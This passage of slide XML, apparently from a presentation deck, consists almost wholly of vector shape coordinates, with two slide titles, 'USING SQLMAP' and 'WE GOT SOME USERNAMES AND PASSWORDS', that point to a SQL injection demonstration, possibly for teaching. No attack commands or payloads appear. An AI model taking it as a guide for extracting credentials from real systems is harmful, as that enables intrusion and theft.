                  <a:pt x="1503680" y="170180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1414780" y="151130"/>
                  <a:pt x="1160780" y="180340"/>
                  <a:pt x="1075690" y="193040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1038860" y="199390"/>
                  <a:pt x="1032510" y="208280"/>
                  <a:pt x="998220" y="213360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="930910" y="222250"/>
                  <a:pt x="777240" y="210820"/>
                  <a:pt x="698500" y="218440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="645160" y="223520"/>
                  <a:pt x="618490" y="236220"/>
                  <a:pt x="565150" y="241300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="483870" y="247650"/>
                  <a:pt x="330200" y="222250"/>
                  <a:pt x="259080" y="242570"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214630" y="254000"/>
                  <a:pt x="158750" y="280670"/>
                  <a:pt x="160020" y="300990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161290" y="330200"/>
                  <a:pt x="326390" y="361950"/>
                  <a:pt x="378460" y="394970"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="414020" y="416560"/>
                  <a:pt x="427990" y="448310"/>
                  <a:pt x="457200" y="461010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="485140" y="472440"/>
                  <a:pt x="519430" y="458470"/>
                  <a:pt x="548640" y="467360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="579120" y="477520"/>
                  <a:pt x="601980" y="511810"/>
                  <a:pt x="637540" y="519430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="683260" y="529590"/>
                  <a:pt x="755650" y="502920"/>
                  <a:pt x="803910" y="506730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="840740" y="510540"/>
                  <a:pt x="859790" y="525780"/>
                  <a:pt x="900430" y="530860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="966470" y="538480"/>
                  <a:pt x="1096010" y="524510"/>
                  <a:pt x="1167130" y="530860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1216660" y="535940"/>
                  <a:pt x="1249680" y="551180"/>
                  <a:pt x="1290320" y="554990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1328420" y="558800"/>
                  <a:pt x="1367790" y="547370"/>
                  <a:pt x="1404620" y="556260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1445260" y="563880"/>
                  <a:pt x="1470660" y="596900"/>
                  <a:pt x="1525270" y="608330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1625600" y="628650"/>
                  <a:pt x="1861820" y="618490"/>
                  <a:pt x="1976120" y="604520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2048510" y="595630"/>
                  <a:pt x="2105660" y="591820"/>
                  <a:pt x="2148840" y="563880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2186940" y="538480"/>
                  <a:pt x="2203450" y="473710"/>
                  <a:pt x="2231390" y="453390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2247900" y="440690"/>
                  <a:pt x="2265680" y="434340"/>
                  <a:pt x="2283460" y="434340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2301240" y="434340"/>
                  <a:pt x="2322830" y="439420"/>
                  <a:pt x="2336800" y="450850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2354580" y="466090"/>
                  <a:pt x="2373630" y="500380"/>
                  <a:pt x="2372360" y="524510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2372360" y="548640"/>
                  <a:pt x="2350770" y="581660"/>
                  <a:pt x="2331720" y="595630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2317750" y="607060"/>
                  <a:pt x="2296160" y="612140"/>
                  <a:pt x="2278380" y="609600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2255520" y="605790"/>
                  <a:pt x="2221230" y="585470"/>
                  <a:pt x="2209800" y="565150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2197100" y="543560"/>
                  <a:pt x="2197100" y="504190"/>
                  <a:pt x="2207260" y="482600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2218690" y="461010"/>
                  <a:pt x="2250440" y="438150"/>
                  <a:pt x="2274570" y="435610"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2297430" y="431800"/>
                  <a:pt x="2334260" y="445770"/>
                  <a:pt x="2350770" y="463550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2367280" y="481330"/>
                  <a:pt x="2373630" y="514350"/>
                  <a:pt x="2369820" y="543560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2367280" y="579120"/>
                  <a:pt x="2344420" y="628650"/>
                  <a:pt x="2317750" y="657860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2289810" y="687070"/>
                  <a:pt x="2249170" y="702310"/>
                  <a:pt x="2207260" y="721360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2153920" y="744220"/>
                  <a:pt x="2095500" y="767080"/>
                  <a:pt x="2018030" y="778510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1898650" y="795020"/>
                  <a:pt x="1697990" y="791210"/>
                  <a:pt x="1554480" y="775970"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1427480" y="763270"/>
                  <a:pt x="1309370" y="717550"/>
                  <a:pt x="1197610" y="706120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1099820" y="695960"/>
                  <a:pt x="991870" y="711200"/>
                  <a:pt x="919480" y="704850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="872490" y="699770"/>
                  <a:pt x="847090" y="687070"/>
                  <a:pt x="803910" y="681990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="748030" y="676910"/>
                  <a:pt x="683260" y="694690"/>
                  <a:pt x="610870" y="679450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="506730" y="656590"/>
                  <a:pt x="351790" y="571500"/>
                  <a:pt x="247650" y="519430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166370" y="478790"/>
                  <a:pt x="72390" y="449580"/>
                  <a:pt x="34290" y="401320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7620" y="367030"/>
                  <a:pt x="0" y="322580"/>
                  <a:pt x="2540" y="287020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5080" y="252730"/>
                  <a:pt x="25400" y="220980"/>
                  <a:pt x="46990" y="193040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72390" y="160020"/>
                  <a:pt x="110490" y="125730"/>
                  <a:pt x="151130" y="105410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194310" y="85090"/>
                  <a:pt x="232410" y="83820"/>
                  <a:pt x="300990" y="74930"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="449580" y="57150"/>
                  <a:pt x="814070" y="60960"/>
                  <a:pt x="1005840" y="44450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1139190" y="33020"/>
                  <a:pt x="1247140" y="5080"/>
                  <a:pt x="1344930" y="2540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1418590" y="0"/>
                  <a:pt x="1483360" y="1270"/>
                  <a:pt x="1541780" y="16510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1591310" y="29210"/>
                  <a:pt x="1629410" y="66040"/>
                  <a:pt x="1673860" y="78740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1711960" y="90170"/>
                  <a:pt x="1743710" y="82550"/>
                  <a:pt x="1789430" y="93980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1864360" y="113030"/>
                  <a:pt x="1991360" y="182880"/>
                  <a:pt x="2075180" y="199390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2138680" y="210820"/>
                  <a:pt x="2188210" y="196850"/>
                  <a:pt x="2246630" y="203200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2308860" y="208280"/>
                  <a:pt x="2401570" y="213360"/>
                  <a:pt x="2439670" y="232410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2459990" y="243840"/>
                  <a:pt x="2471420" y="256540"/>
                  <a:pt x="2479040" y="273050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2485390" y="288290"/>
                  <a:pt x="2486660" y="312420"/>
                  <a:pt x="2481580" y="328930"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2475230" y="345440"/>
                  <a:pt x="2461260" y="363220"/>
                  <a:pt x="2446020" y="372110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2430780" y="381000"/>
                  <a:pt x="2391410" y="381000"/>
                  <a:pt x="2391410" y="381000"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E719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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229553" y="4425315"/>
            <a:ext cx="4394835" cy="1173480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5859780" h="1564640" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="5200650" y="262890"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4290060" y="228600"/>
                  <a:pt x="4102100" y="200660"/>
                  <a:pt x="3896360" y="194310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3680460" y="186690"/>
                  <a:pt x="3357880" y="186690"/>
                  <a:pt x="3233420" y="198120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3185160" y="201930"/>
                  <a:pt x="3171190" y="204470"/>
                  <a:pt x="3131820" y="214630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3078480" y="229870"/>
                  <a:pt x="3008630" y="271780"/>
                  <a:pt x="2942590" y="289560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2874010" y="307340"/>
                  <a:pt x="2838450" y="312420"/>
                  <a:pt x="2725420" y="320040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2344420" y="347980"/>
                  <a:pt x="459740" y="330200"/>
                  <a:pt x="205740" y="320040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161290" y="318770"/>
                  <a:pt x="132080" y="325120"/>
                  <a:pt x="127000" y="313690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121920" y="303530"/>
                  <a:pt x="170180" y="250190"/>
                  <a:pt x="177800" y="252730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186690" y="256540"/>
                  <a:pt x="173990" y="303530"/>
                  <a:pt x="176530" y="336550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="180340" y="386080"/>
                  <a:pt x="195580" y="473710"/>
                  <a:pt x="210820" y="520700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220980" y="551180"/>
                  <a:pt x="231140" y="570230"/>
                  <a:pt x="246380" y="593090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="260350" y="615950"/>
                  <a:pt x="284480" y="632460"/>
                  <a:pt x="299720" y="656590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="316230" y="681990"/>
                  <a:pt x="317500" y="722630"/>
                  <a:pt x="336550" y="742950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="354330" y="762000"/>
                  <a:pt x="386080" y="760730"/>
                  <a:pt x="407670" y="779780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="434340" y="800100"/>
                  <a:pt x="450850" y="843280"/>
                  <a:pt x="480060" y="867410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="509270" y="890270"/>
                  <a:pt x="537210" y="900430"/>
                  <a:pt x="582930" y="919480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="668020" y="956310"/>
                  <a:pt x="864870" y="1026160"/>
                  <a:pt x="958850" y="1054100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1012190" y="1069340"/>
                  <a:pt x="1033780" y="1075690"/>
                  <a:pt x="1089660" y="1084580"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1183640" y="1101090"/>
                  <a:pt x="1334770" y="1116330"/>
                  <a:pt x="1474470" y="1122680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1643380" y="1131570"/>
                  <a:pt x="1922780" y="1109980"/>
                  <a:pt x="2034540" y="1121410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2081530" y="1125220"/>
                  <a:pt x="2095500" y="1136650"/>
                  <a:pt x="2136140" y="1141730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2192020" y="1149350"/>
                  <a:pt x="2287270" y="1140460"/>
                  <a:pt x="2343150" y="1151890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2382520" y="1159510"/>
                  <a:pt x="2405380" y="1181100"/>
                  <a:pt x="2439670" y="1188720"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2476500" y="1195070"/>
                  <a:pt x="2510790" y="1186180"/>
                  <a:pt x="2553970" y="1191260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611120" y="1198880"/>
                  <a:pt x="2674620" y="1226820"/>
                  <a:pt x="2750820" y="1238250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2852420" y="1254760"/>
                  <a:pt x="3037840" y="1244600"/>
                  <a:pt x="3112770" y="1266190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3149600" y="1277620"/>
                  <a:pt x="3153410" y="1296670"/>
                  <a:pt x="3188970" y="1308100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3263900" y="1329690"/>
                  <a:pt x="3465830" y="1324610"/>
                  <a:pt x="3545840" y="1336040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3587750" y="1342390"/>
                  <a:pt x="3590290" y="1352550"/>
                  <a:pt x="3639820" y="1357630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3827780" y="1379220"/>
                  <a:pt x="4817110" y="1394460"/>
                  <a:pt x="5005070" y="1361440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5057140" y="1352550"/>
                  <a:pt x="5068570" y="1334770"/>
                  <a:pt x="5100320" y="1327150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5130800" y="1319530"/>
                  <a:pt x="5157470" y="1324610"/>
                  <a:pt x="5193030" y="1315720"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5241290" y="1301750"/>
                  <a:pt x="5303520" y="1272540"/>
                  <a:pt x="5358130" y="1244600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5414010" y="1216660"/>
                  <a:pt x="5472430" y="1186180"/>
                  <a:pt x="5520690" y="1149350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5566410" y="1115060"/>
                  <a:pt x="5615940" y="1079500"/>
                  <a:pt x="5640070" y="1032510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5666740" y="982980"/>
                  <a:pt x="5665470" y="915670"/>
                  <a:pt x="5670550" y="855980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5675630" y="795020"/>
                  <a:pt x="5684520" y="717550"/>
                  <a:pt x="5670550" y="668020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5660390" y="631190"/>
                  <a:pt x="5626100" y="610870"/>
                  <a:pt x="5614670" y="581660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5604510" y="554990"/>
                  <a:pt x="5600700" y="529590"/>
                  <a:pt x="5599430" y="502920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5599430" y="476250"/>
                  <a:pt x="5615940" y="448310"/>
                  <a:pt x="5609590" y="424180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5603240" y="400050"/>
                  <a:pt x="5585460" y="370840"/>
                  <a:pt x="5563870" y="360680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5537200" y="347980"/>
                  <a:pt x="5496560" y="367030"/>
                  <a:pt x="5457190" y="365760"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5403850" y="363220"/>
                  <a:pt x="5322570" y="354330"/>
                  <a:pt x="5271770" y="345440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5233670" y="339090"/>
                  <a:pt x="5212080" y="336550"/>
                  <a:pt x="5173980" y="325120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5115560" y="306070"/>
                  <a:pt x="5015230" y="242570"/>
                  <a:pt x="4959350" y="232410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4925060" y="226060"/>
                  <a:pt x="4906010" y="240030"/>
                  <a:pt x="4875530" y="234950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4839970" y="229870"/>
                  <a:pt x="4790440" y="214630"/>
                  <a:pt x="4761230" y="195580"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4735830" y="180340"/>
                  <a:pt x="4710430" y="160020"/>
                  <a:pt x="4704080" y="135890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4697730" y="113030"/>
                  <a:pt x="4706620" y="74930"/>
                  <a:pt x="4721860" y="55880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4737100" y="38100"/>
                  <a:pt x="4773930" y="22860"/>
                  <a:pt x="4798060" y="26670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4822190" y="29210"/>
                  <a:pt x="4853940" y="50800"/>
                  <a:pt x="4865370" y="72390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4876800" y="92710"/>
                  <a:pt x="4876800" y="132080"/>
                  <a:pt x="4865370" y="153670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4853940" y="175260"/>
                  <a:pt x="4822190" y="196850"/>
                  <a:pt x="4798060" y="199390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4773930" y="201930"/>
                  <a:pt x="4738370" y="185420"/>
                  <a:pt x="4721860" y="168910"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4709160" y="156210"/>
                  <a:pt x="4702810" y="134620"/>
                  <a:pt x="4701540" y="118110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4700270" y="100330"/>
                  <a:pt x="4706620" y="78740"/>
                  <a:pt x="4716780" y="63500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4725670" y="49530"/>
                  <a:pt x="4744720" y="35560"/>
                  <a:pt x="4761230" y="30480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4777740" y="24130"/>
                  <a:pt x="4791710" y="26670"/>
                  <a:pt x="4817110" y="30480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4870450" y="38100"/>
                  <a:pt x="5003800" y="80010"/>
                  <a:pt x="5067300" y="104140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5107940" y="120650"/>
                  <a:pt x="5121910" y="139700"/>
                  <a:pt x="5165090" y="151130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5234940" y="170180"/>
                  <a:pt x="5373370" y="163830"/>
                  <a:pt x="5458460" y="179070"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5524500" y="189230"/>
                  <a:pt x="5582920" y="189230"/>
                  <a:pt x="5632450" y="220980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5684520" y="252730"/>
                  <a:pt x="5739130" y="323850"/>
                  <a:pt x="5760720" y="374650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5777230" y="412750"/>
                  <a:pt x="5763260" y="445770"/>
                  <a:pt x="5773420" y="486410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5787390" y="541020"/>
                  <a:pt x="5833110" y="599440"/>
                  <a:pt x="5844540" y="668020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5859780" y="751840"/>
                  <a:pt x="5857240" y="869950"/>
                  <a:pt x="5838190" y="953770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5821680" y="1022350"/>
                  <a:pt x="5782310" y="1093470"/>
                  <a:pt x="5751830" y="1136650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5731510" y="1164590"/>
                  <a:pt x="5704840" y="1176020"/>
                  <a:pt x="5687060" y="1197610"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5670550" y="1219200"/>
                  <a:pt x="5673090" y="1242060"/>
                  <a:pt x="5647690" y="1266190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5588000" y="1322070"/>
                  <a:pt x="5360670" y="1423670"/>
                  <a:pt x="5267960" y="1457960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5218430" y="1475740"/>
                  <a:pt x="5182870" y="1471930"/>
                  <a:pt x="5148580" y="1484630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5119370" y="1496060"/>
                  <a:pt x="5114290" y="1515110"/>
                  <a:pt x="5071110" y="1525270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4912360" y="1564640"/>
                  <a:pt x="4140200" y="1532890"/>
                  <a:pt x="3883660" y="1530350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3760470" y="1529080"/>
                  <a:pt x="3709670" y="1530350"/>
                  <a:pt x="3610610" y="1524000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3489960" y="1515110"/>
                  <a:pt x="3308350" y="1501140"/>
                  <a:pt x="3214370" y="1477010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3161030" y="1464310"/>
                  <a:pt x="3138170" y="1438910"/>
                  <a:pt x="3091180" y="1430020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3036570" y="1419860"/>
                  <a:pt x="2983230" y="1433830"/>
                  <a:pt x="2907030" y="1427480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2783840" y="1418590"/>
                  <a:pt x="2527300" y="1386840"/>
                  <a:pt x="2420620" y="1355090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2366010" y="1339850"/>
                  <a:pt x="2338070" y="1308100"/>
                  <a:pt x="2302510" y="1301750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2274570" y="1297940"/>
                  <a:pt x="2256790" y="1310640"/>
                  <a:pt x="2225040" y="1310640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2175510" y="1309370"/>
                  <a:pt x="2117090" y="1290320"/>
                  <a:pt x="2034540" y="1285240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1884680" y="1273810"/>
                  <a:pt x="1581150" y="1285240"/>
                  <a:pt x="1402080" y="1275080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1267460" y="1268730"/>
                  <a:pt x="1176020" y="1267460"/>
                  <a:pt x="1051560" y="1243330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="901700" y="1215390"/>
                  <a:pt x="689610" y="1158240"/>
                  <a:pt x="565150" y="1103630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480060" y="1065530"/>
                  <a:pt x="405130" y="1013460"/>
                  <a:pt x="361950" y="975360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336550" y="955040"/>
                  <a:pt x="331470" y="935990"/>
                  <a:pt x="309880" y="916940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="280670" y="891540"/>
                  <a:pt x="233680" y="880110"/>
                  <a:pt x="199390" y="840740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144780" y="778510"/>
                  <a:pt x="72390" y="621030"/>
                  <a:pt x="45720" y="551180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31750" y="515620"/>
                  <a:pt x="31750" y="495300"/>
                  <a:pt x="24130" y="464820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16510" y="431800"/>
                  <a:pt x="6350" y="393700"/>
                  <a:pt x="2540" y="359410"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="328930"/>
                  <a:pt x="0" y="302260"/>
                  <a:pt x="5080" y="271780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10160" y="238760"/>
                  <a:pt x="12700" y="190500"/>
                  <a:pt x="38100" y="168910"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71120" y="140970"/>
                  <a:pt x="116840" y="153670"/>
                  <a:pt x="205740" y="147320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="549910" y="127000"/>
                  <a:pt x="2353310" y="167640"/>
                  <a:pt x="2722880" y="147320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2827020" y="140970"/>
                  <a:pt x="2857500" y="142240"/>
                  <a:pt x="2922270" y="124460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2989580" y="106680"/>
                  <a:pt x="3030220" y="55880"/>
                  <a:pt x="3119120" y="36830"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3286760" y="0"/>
                  <a:pt x="3629660" y="22860"/>
                  <a:pt x="3868420" y="33020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4088130" y="40640"/>
                  <a:pt x="4281170" y="69850"/>
                  <a:pt x="4498340" y="83820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4730750" y="96520"/>
                  <a:pt x="5124450" y="78740"/>
                  <a:pt x="5218430" y="110490"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5245100" y="119380"/>
                  <a:pt x="5253990" y="128270"/>
                  <a:pt x="5264150" y="142240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5273040" y="156210"/>
                  <a:pt x="5279390" y="177800"/>
                  <a:pt x="5276850" y="194310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5274310" y="212090"/>
                  <a:pt x="5264150" y="232410"/>
                  <a:pt x="5251450" y="243840"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5238750" y="254000"/>
                  <a:pt x="5200650" y="262890"/>
                  <a:pt x="5200650" y="262890"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E719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64" name="Google Shape;264;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140883" y="150533"/>
            <a:ext cx="18006234" cy="998593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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1356723"/>
            <a:ext cx="12039600" cy="112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USING SQLMAP</a:t>
            </a:r>
            <a:endParaRPr sz="657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6" name="Google Shape;266;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3441429" y="8718837"/>
            <a:ext cx="1140514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WE GOT SOME USERNAMES AND PASSWORDS</a:t>
            </a:r>
            <a:endParaRPr sz="21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663528" y="4887756"/>
            <a:ext cx="16713713" cy="3029360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
